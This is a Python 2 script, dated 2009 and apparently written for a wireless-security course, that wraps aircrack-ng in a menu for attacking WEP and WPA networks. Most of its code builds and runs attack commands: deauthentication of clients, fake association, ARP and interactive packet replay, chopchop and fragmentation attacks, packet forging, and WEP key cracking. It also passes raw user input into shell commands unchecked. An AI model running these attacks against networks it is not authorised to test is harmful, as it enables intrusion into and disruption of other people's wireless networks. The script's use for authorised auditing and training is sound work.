1. #!/usr/bin/python
  2. # WEP and WPA Auditing tool
  3. # Coded by MrMe
  4. # Uses aircrack-ng 'http://aircrack-ng.org/doku.php'
  5. # WARNING: This script assumes you know something about wifi
  6. # I write this script because I cant remember syntax :(
  7. # Also made to destroy the wifu exam
  8. #
  9.  
  10. import hashlib, sys, os,fileinput, re, time, thread 
  11. from optparse import OptionParser 
  12.  
  13. usage= "./%prog -i interface" 
  14. usage = usage+"\nExample: ./%prog -i ath0" 
  15. parser = OptionParser(usage=usage) 
  16. parser.add_option("-i", type="string", 
  17.                   action="store", dest="intf", 
  18.                   help="Your interface") 
  19. (options, args) = parser.parse_args() 
  20.  
  21. def banner():
  22. 	print "\n|---------------------------------------------------|" 
  23. 	print "|    WEP & WPA auditing tool made during WIFU :)    |" 
  24. 	print "|                 by MrMe 07/2009                   |" 
  25. 	print "|---------------------------------------------------|\n" 
  26.  
  27. def is_there_aircrack():
  28. 	booya = os.popen("aircrack-ng")
  29. 	if not re.search("http://www.aircrack-ng.org",booya.read()):
  30. 		banner()
  31. 		print "[-] Please install aircrack-ng before continuing"
  32. 		print "[-] apt-get install aircrack-ng"
  33. 		print "[-] yum install aircrack-ng"
  34. 		sys.exit(0)
  35.  
  36. if len(sys.argv) != 3: 
  37. 	banner()
  38.    	parser.print_help() 
  39. 	sys.exit(1) 
  40.  
  41. # some global variables
  42. verbose = 'true'
  43. intf = options.intf
  44.  
  45. def reset():
  46. 	if intf == 'ath0':
  47. 		unload = os.system("rmmod ath_pci")
  48. 		load = os.system("modprobe ath_pci")
  49. 		print "\n[+] Loaded and ready"
  50. 	elif intf == 'wlan0':
  51. 		unload = os.system("rmmod r8187")
  52. 		load = os.system("modprobe r8187")
  53. 		print "\n[+] Loaded and ready"
  54. 	else:
  55. 		print "[-] Interface not supported for this option"
  56.  
  57. def targetSetup():
  58. 	kill = os.system("airmon-ng stop "+intf)
  59. 	if intf == 'ath0':
  60. 		exe = os.system('airmon-ng start wifi0')
  61. 	else:
  62. 		exe = os.system('airmon-ng start '+intf)
  63.  
  64. def execute():
  65. 	run = 'on'
  66. 	while run == 'on':
  67. 		print "\n|--------------------------------|"
  68. 		print "|      Select an option type     |" 
  69. 		print "|--------------------------------|\n"
  70. 		print "[1] Reset the driver modules"
  71. 		print "[2] Setup wifi NIC and choose target"
  72. 		print "[3] Injection test against target" 
  73. 		print "[4] De-authenticate a client" 
  74. 		print "[5] Fake associate with the AP" 
  75. 		print "[6] Shared key fake association"
  76. 		print "[7] Interactive packet replay" 
  77. 		print "[8] Arp request replay" 
  78. 		print "[9] Korek chop chop attack" 
  79. 		print "[10] Fragmentation attack" 
  80. 		print "[11] Forge and inject using the xor file"
  81. 		print "[12] Crack the WEP key"
  82. 		print "[13] Exit\n" 
  83. 		option=raw_input('[+] Please enter a value: ')
  84.  
  85.         	if option == '13':
  86. 			print "[+] Hope you had fun"
  87. 			sys.exit(0)
  88. 		if option == '1':
  89. 			reset()
  90. 		if option == '2':
  91. 			targetSetup()
  92. 			print "\n[+] Gathering target information.."
  93. 			airo = 'xterm -T "Searching for target AP\'s" -e airodump-ng '+intf
  94. 			exec_=os.popen(airo)
  95. 			time.sleep(3)
  96. 			ch=raw_input('[+] Please enter target channel: ')
  97. 			ch = str(ch)
  98. 			bssid=raw_input('[+] Please enter the target BSSID: ')
  99. 			while len(bssid) != 17:
  100. 				print '\n[-] Check your BSSID and enter it again. Eg: 00:1b:2f:67:9b:f3'
  101. 				bssid=raw_input('[+] Please enter the target BSSID: ')
  102. 			essid=raw_input('[+] Please enter the target ESSID: ')
  103. 			mymac=raw_input('[+] Please enter the MAC addess for '+intf+': ')
  104. 			while len(mymac) != 17:
  105. 				print '\n[-] Check your MAC address and enter it again. Eg: 00:1b:2f:67:9b:f3'
  106. 				mymac=raw_input('[+] Please enter the MAC addess for '+intf+': ')
  107. 			if not bssid or not essid or not ch:
  108. 				print '\n[-] Please enter the details correctly next time.. exiting..'
  109. 				sys.exit(0)
  110. 			print "[+] Setting up your interface for the specifid target.."
  111. 			kill = os.system("airmon-ng stop "+intf)
  112. 			if intf == 'ath0':
  113. 				cmd = 'airmon-ng start wifi0 '+ch
  114. 				exe = os.system(cmd)
  115. 			else:
  116. 				exe = os.system('airmon-ng start '+intf+' '+ch)
  117. 			dump = 'xterm -T "Dumping target" -e airodump-ng -c '+ch+' --bssid '+bssid+' -w '+essid+' '+intf+' &'
  118. 			exe_dump = os.system(dump)
  119. 			time.sleep(3)
  120. 			print '\n[+] Ready to rock and roll! :)'
  121. 		if option == '3':
  122. 			print "[+] Testing AP please wait.."
  123. 			test1 = 'aireplay-ng -9 -e "'+essid+'" -a '+bssid+' '+intf
  124. 			test = os.popen(test1)
  125. 			if verbose == 'true':
  126. 				print "[+] Command: "+test1+'\n'
  127. 				print test.read()
  128. 			if re.search("No such BSSID",test.read()):
  129. 				print "[-] Please check your BSSID!"
  130. 				sys.exit(0)
  131. 			else:
  132. 				print "[+] Injection is working!"		
  133. 		if option == '4':
  134. 			client=raw_input('[+] Please enter the targets clients MAC: ')
  135. 			print "[+] Deauth'ing with 1 packets please wait.."
  136. 			attack2 = 'aireplay-ng -0 1 -e "'+essid+'" -a '+bssid+' -c '+client+' '+intf
  137. 			exe = os.popen(attack2)
  138. 			if verbose == 'true':
  139. 				print '[+] Command: "'+attack2+'"\n'
  140. 				print exe.read()
  141. 		if option == '5':
  142.  
  143. 			print "[+] Associating with the AP please wait.."
  144. 			test1 = 'aireplay-ng -1 0 -e "'+essid+'" -a '+bssid+' -h '+mymac+' '+intf
  145. 			test = os.popen(test1)
  146. 			if verbose == 'true':
  147. 				print '[+] Command: "'+test1+'"\n'
  148. 				print test.read()
  149. 		if option == '6':
  150. 			print "[+] Associating with the AP please wait.."
  151. 			print "[+] Using shared key.."
  152. 			asso = 'aireplay-ng -1 0 -e "'+essid+'" -y '+essid+'*.xor -a '+bssid+' -h '+mymac+' '+intf
  153. 			exec_shaasso = os.popen(asso)
  154. 			if verbose == 'true':
  155. 				print '[+] Command: "'+asso+'"\n'
  156. 				print exec_shaasso.read()
  157. 		if option == '7':
  158. 			print "[+] Starting interactive packet replay attack.."
  159. 			inter = 'aireplay-ng -2 -b '+bssid+' -d FF:FF:FF:FF:FF:FF -t 1 '+intf
  160. 			if verbose == 'true':
  161. 				print "[+] Command: "+inter+'\n'
  162. 				print "[+] Now try deauth'ing a client or wait.."
  163. 				print "[+] If you get a ARP packet then crack the key"
  164. 			exe = os.system(inter)
  165. 		if option == '8':
  166. 			print "[+] Starting ARP request replay attack.."
  167. 			print "[+] If you get a ARP packet then crack the key"
  168. 			arp = 'aireplay-ng -3 -b '+bssid+' -h '+mymac+' '+intf
  169. 			if verbose == 'true':
  170. 				print "[+] Command: "+arp+'\n'
  171. 			test = os.system(arp)
  172. 		if option == '9':
  173. 			print "[+] Starting Korek chop chop attack.."
  174. 			chop = 'aireplay-ng -4 -h '+mymac+' -b '+bssid+' '+intf
  175. 			if verbose == 'true':
  176. 				print '[+] Command: "'+chop+'"\n'	
  177. 			exe = os.system(chop)
  178. 		if option == '10':
  179. 			print "[+] Starting fragmentation attack.."
  180. 			frag = 'aireplay-ng -5 -b '+bssid+' -h '+mymac+' '+intf
  181. 			if verbose == 'true':
  182. 				print '[+] Command: "'+frag+'"\n'	
  183. 			exe = os.system(frag)
  184. 		if option == '11':
  185. 			print "[+] Forging arbitary data packet.."
  186. 			forge = 'packetforge-ng -0 -a '+bssid+' -h '+mymac+' -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-request'
  187. 			if verbose == 'true':
  188. 				print '[+] Command: "'+forge+'"\n'	
  189. 			exe = os.system(forge)	
  190. 			print "[+] Now lets inject the forged packet :)"
  191. 			inject = 'xterm -T "Injecting forged packet" -e "aireplay-ng -2 -r arp-request "'+intf+' &'
  192. 			exe_dump = os.system(inject)
  193. 			time.sleep(3)
  194. 		if option == '12':
  195. 			print "[+] Crack time!"
  196. 			print "[+] aircrack-ng -0 -z "+essid+"*.cap\n"
  197. 			crack = 'xterm -T "Cracking.." -e "aircrack-ng -0 -z '+essid+'*.cap; bash"\n'
  198. 			exe_crack = os.system(crack)
  199. is_there_aircrack()
  200. banner()
  201. execute()